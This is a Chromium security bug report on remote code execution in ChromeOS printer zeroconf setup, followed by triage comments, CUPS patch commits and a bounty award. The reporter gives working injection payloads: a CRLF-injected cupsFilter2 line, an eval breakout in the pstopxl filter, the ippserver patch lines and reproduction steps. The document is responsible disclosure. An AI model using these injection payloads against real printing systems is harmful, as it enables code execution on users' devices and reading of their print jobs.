Issue metadata
Sign in to add a comment
|
Security: ChromeOS printer zeroconf remote code execution
Reported by
r...@rorym.cnamara.com,
Oct 22 2017
|
||||||||||||||||||||||||
Issue description
Google Chrome 61.0.3163.123 (Official Build) (64-bit)
Platform 9765.85.0 (Official Build) stable-channel swanky
Firmware Version Google_Swanky.5216.238.5
Two different bugs (CRLF injection and eval based code injection) can be used by a malicious IPP server to cause ChromeOS to install a malicious PPD file which, on printing, will cause the payload to be executed with the same privileges as the cups daemon (cups:root inside a seccomp jail [1]).
To enable exploitation, the test ippserver from the cups distribution [2] can be modified and used.
The IPP server can specify formats to be accepted by the printer, which can be used to specify a specific filter executable to be executed when a print job is sent. Since the passed value is interpolated into the cupsFilter2 line, it is necessary to inject newlines and PPD comment characters to completely control the configuration item.
cupsFilter2 lines should normally look similar to:
*cupsFilter2: "application/vnd.cups-pdf application/pdf 10 -"
but the IPP server can control the second parameter, so we can inject a payload as below:
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo **** ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo **** ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% 10 -"
The payload is injected twice, but we can use \n*% to cause subsequent lines to be turned into comments. The format of our payload will become clear with the second exploit.
The configuration for this bug is specified in the 'formats' variable in the malicious IPP server [3], which we can change to the following to achieve the above payload:
- *formats = "application/pdf,image/jpeg,image/pwg-raster";
+ *formats = "application/pdf,application/pdf application/vnd.cups-postscript 0 pstopxl\"\n*%;echo ********EXPLOIT START********|logger;env|logger;echo **** ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit\n*%";
Along with our payload, we also specify the 'pstopxl' filter executable, which is present on ChromeOS. This executable contains an eval based command injection vulnerability. eval is used in multiple locations throughout the cups filter distributions, but the specific one we exploit in this case is the DefaultInputSlot injection point [4]. This parameter can also be controlled by the malicious IPP server to cause the injection. In this case we modify the 'media_source_supported' array by changing the default value of 'auto' to one that will break out of the eval location and execute our code.
- "auto",
+ "x}\"$(sh${IFS}${PPD})\"x",
Since the payload length is limited, we use the PPD file itself as a shell based payload. As can be seen in the above cupsFilter2 payload, we use ; to add multiple commands on the same line, and an 'exit' so the payload is not executed twice. The value of ${PPD} is set by the parent of the filter, so we do not need to worry about locating our payload file. In my tests, all lines in the PPD file are not valid shell commands, so there are no side effects other than errors being output for invalid commands.
With these two exploits the malicious IPP server can gain command execution on ChromeOS as cups:root, inside the seccomp jail [1]. I was unable to escape from the seccomp jail and limited user, but the seccomp policy is open enough for most malicious activities. From the restricted position, the payload should be able to read most current and future print jobs (after a reboot it would be necessary for the malicious printer to be re-used as there is no persistence)
To reproduce this vulnerability, patch ippserver from the cups distribution using the attached patch (commit 0bc1a539f used for testing, but any should work). Compile and run similarly to the following:
sudo ./ippserver -v exploit -p 631
Add a new printer
- chrome://md-settings/cupsPrinters
- or print a page, change Destination, Local Destinations -> Manage (will redirect to chrome://settings/cupsPrinters)
Add printer, Add nearby printer
Once the printer has been added using zeroconf, print to it and observe the payload output in file:///var/log/messages (^F for EXPLOIT). Interestingly,
printers added using this method persist across a powerwash (noticed when transitioning into dev mode).
The exploit printer could masquerade as a legitimate printer, and proxy all jobs to the real printer for invisible exploitation.
Judging by the network traffic generated by the print preview window, I would imagine that one day local printers would automatically appear, increasing the likelihood of this exploit, but I was unable to get this to work, hence having to navigate to the settings and add the printer with more button clicks.
A LAN presence is required to exploit this vulnerability.
I have also attached the PPD file created on the device (obtained via developer mode) to show the injection locations.
[1] https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/master/net-print/cups/files/cupsd-seccomp-amd64.policy
[2] https://github.com/apple/cups/blob/master/test/ippserver.c
[3] https://github.com/apple/cups/blob/master/test/ippserver.c#L485
[4] https://github.com/richud/gstoraster/blob/master/cups/gstopxl#L110
,
Oct 24 2017
,
Oct 25 2017
Sandboxed RCE is... not great. Andrew, this needs to be handled by the CUPS CrOS printing team ASAP as a high-severity bug.
,
Oct 25 2017
,
Oct 25 2017
Also, do we even need zeroconf?
,
Oct 25 2017
Zeroconf is a critical feature for the product. Assigning to Sean to look at as Justin (who worked a lot on this) is ooo a lot of this week, including now.
,
Oct 25 2017
We usually mark high-severity bugs as P1 (sandboxed code exec is high-severity per our ratings at http://www.chromium.org/developers/severity-guidelines), but we do expect it to be fixed in the current milestone and backported to stable. Thanks!
,
Oct 26 2017
I'm looking into this. We can likely disable downloading arbitrary PPDs from untrusted servers.
,
Oct 26 2017
There are two patches from upstream that restrict what filters we accept which will prevent the pstopxl filter being configured for zeroconf printers. https://github.com/apple/cups/commit/07428f6a640ff93aa0b4cc69ca372e2cf8490e41 https://github.com/apple/cups/commit/1add23375658e9163e5493ee19de7c9f7a9b483b
,
Oct 26 2017
Thanks Sean! Can we also do something about the CRLF injection, maybe patch that locally? Or, can we remove and/or fix the eval in the pstopxl filter?
,
Oct 26 2017
Quick note, pstopxl was not the only filter that appeared to contain exploitable evals, I can't check on my device right now but grepping in /usr/libexec/cups/filter/ should find more.
,
Oct 27 2017
The NextAction date has arrived: 2017-10-27
,
Oct 27 2017
Hey Sean, were you able to at least start landing those patches? We can look at the other filters next, but we should start by making sure pstopxl is not reachable. Thanks!
,
Oct 27 2017
I just sent a CL so we don't configure pstopxl as a filter for an automatically configured printer. I'm going to look into the filters before the CRLF injection. We're going to stop allowing insertion of arbitrary values for filters but there are other fields where we should disallow CRLF.
,
Oct 28 2017
,
Oct 29 2017
It looks like gstopxl is from cups-filters, not ghostscript. I'm investigating if it can be removed.
,
Oct 30 2017
The NextAction date has arrived: 2017-10-30
,
Oct 30 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448 commit 2ef707a9b50f577b2d4b5fdfcea99736a5ac9448 Author: Sean Kau <skau@chromium.org> Date: Mon Oct 30 23:21:07 2017 net-print/cups: Backport patches to restrict IPP Everywhere filters. Restrict filters we accept for IPP Everywhere configurations to exactly PDF, JPEG, PNG, PWG-Raster. URF was added in the original patch but has been explicitly excluded since we lack the appropriate filter changes. BUG= chromium:777215 TEST=Verify zeroconf setup still works. Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb Reviewed-on: https://chromium-review.googlesource.com/742381 Commit-Ready: Sean Kau <skau@chromium.org> Tested-by: Sean Kau <skau@chromium.org> Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org> [rename] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4-r28.ebuild [add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch [modify] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4.ebuild [add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch
,
Oct 30 2017
,
Nov 1 2017
,
Nov 3 2017
Updating cups-filters to the current version (1.17.8) removes the eval vulnerability.
,
Nov 3 2017
I'm going to mark this as fixed so I can get the cherry-pick approved.
,
Nov 3 2017
,
Nov 3 2017
This bug requires manual review: M63 has already been promoted to the beta branch, so this requires manual review Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 4 2017
,
Nov 6 2017
,
Nov 6 2017
,
Nov 6 2017
approving M-62 and M-63
,
Nov 6 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/3de55925d80fc923c793a0ffefdb0cbb177996d6 commit 3de55925d80fc923c793a0ffefdb0cbb177996d6 Author: Sean Kau <skau@chromium.org> Date: Mon Nov 06 22:42:46 2017 net-print/cups: Backport patches to restrict IPP Everywhere filters. Restrict filters we accept for IPP Everywhere configurations to exactly PDF, JPEG, PNG, PWG-Raster. URF was added in the original patch but has been explicitly excluded since we lack the appropriate filter changes. BUG= chromium:777215 TEST=Verify zeroconf setup still works. Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb Previous-Reviewed-on: https://chromium-review.googlesource.com/742381 (cherry picked from commit ea0ae7891ba8e2983634f406c9df7ce746962a90) Reviewed-on: https://chromium-review.googlesource.com/747848 Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org> Commit-Queue: Sean Kau <skau@chromium.org> Tested-by: Sean Kau <skau@chromium.org> Trybot-Ready: Sean Kau <skau@chromium.org> [add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4-r28.ebuild [add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch [modify] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4.ebuild [add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch
,
Nov 6 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/00e71e234336642d5ccbdc657286fd7d9086602d commit 00e71e234336642d5ccbdc657286fd7d9086602d Author: Sean Kau <skau@chromium.org> Date: Mon Nov 06 22:42:51 2017 net-print/cups: Backport patches to restrict IPP Everywhere filters. Restrict filters we accept for IPP Everywhere configurations to exactly PDF, JPEG, PNG, PWG-Raster. URF was added in the original patch but has been explicitly excluded since we lack the appropriate filter changes. BUG= chromium:777215 TEST=Verify zeroconf setup still works. Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb Previous-Reviewed-on: https://chromium-review.googlesource.com/742381 (cherry picked from commit 9e2af650268d45e9e51ae1da29ff6bbed934ecf5) Reviewed-on: https://chromium-review.googlesource.com/747871 Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org> Commit-Queue: Sean Kau <skau@chromium.org> Tested-by: Sean Kau <skau@chromium.org> Trybot-Ready: Sean Kau <skau@chromium.org> [rename] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4-r28.ebuild [add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch [modify] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4.ebuild [add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch
,
Nov 7 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/overlays/portage-stable/+/8827c2d9757d829a474163eb7150e66e37064284 commit 8827c2d9757d829a474163eb7150e66e37064284 Author: Sean Kau <skau@chromium.org> Date: Tue Nov 07 07:49:01 2017 net-print/cups-filters: Update to 1.17.8 Updating the cups-fitlers package to 1.17.8 from 1.8.2. Many of the filters were rewritten to remove a lot of the bash scripts. The previously included patches are in 1.17.8. BUG= chromium:777215 TEST=Print a page using the foomatic-rip filter. Change-Id: Icbde6517925dd88b3fdf6d170b500dabc144effc Reviewed-on: https://chromium-review.googlesource.com/750045 Commit-Ready: Brian Norris <briannorris@chromium.org> Tested-by: Sean Kau <skau@chromium.org> Reviewed-by: Brian Norris <briannorris@chromium.org> Reviewed-by: Mike Frysinger <vapier@chromium.org> [modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/Manifest [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-configure-PKG_CONFIG.patch [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.71-poppler0340.patch [add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/files/cups-browsed.init.d-r1 [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.service [modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/metadata.xml [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.65-poppler0310.patch [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.init.d [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/cups-filters-1.8.2-r5.ebuild [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster-path-lookup.patch [add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/cups-filters-1.17.8.ebuild [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-disable-ijs.patch [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.53-uclibc.patch [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-foomatic-rip-sig-pipe.patch [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster.patch [delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.1-allow-disable-ghostscript.patch
,
Nov 9 2017
*** Boilerplate reminders! *** Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing. *********************************
,
Nov 9 2017
Nice one! The VRP panel decided to award $2,000 for this report. Thanks!
,
Nov 10 2017
,
Nov 10 2017
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 10 2017
,
Nov 16 2017
Just to close the loop on this, I believe the merges broke some filters which is why Sean did not backport the CUPS uprev.
,
Nov 16 2017
Yes. The filters are not being backported. However, the remote vulnerability is fixed by the cups patch which has been backported to 62.
,
Feb 9 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 27 2018
,
Apr 25 2018
|
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Oct 23 2017Labels: OS-Chrome